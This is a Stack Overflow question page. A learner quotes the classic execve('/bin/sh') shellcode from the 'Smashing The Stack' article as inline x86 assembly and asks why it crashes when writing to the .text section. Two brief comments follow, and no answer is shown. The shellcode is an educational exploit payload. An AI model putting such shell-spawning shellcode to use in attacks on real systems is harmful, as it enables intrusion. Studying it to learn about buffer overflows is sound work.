Explore our sites

Stack Exchange
tour help careers 2.0
Take the 2-minute tour ×
Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required.
up vote 0 down vote favorite

I learned exploit through article "Smashing The Stack For Fun And Profit" and i have some some question about this example

void main() {
__asm__("
    jmp    0x2a                     # 3 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2f                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes
");
}

after call -0x2f, register %esi have address of address of string "/bin/sh", this one also is address of section .text. My implement always crash at line code:

movl %esi,0x8(%esi) # 3 bytes

How can access and use a address that belonged to section .text like beyond example.

share|improve this question
 
For anyone here to help you understand/fix that uncommented assembler code, they'd need to read that entire article on your behalf... –  Oli Charlesworth 22 hours ago
 
I don't know... Article from phrack.org (= phrack.com)... I wonder what kind of stuff the OP is after... –  turboscrew 16 hours ago
add comment

Know someone who can answer? Share a link to this question via email, Google+, Twitter, or Facebook.

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Browse other questions tagged or ask your own question.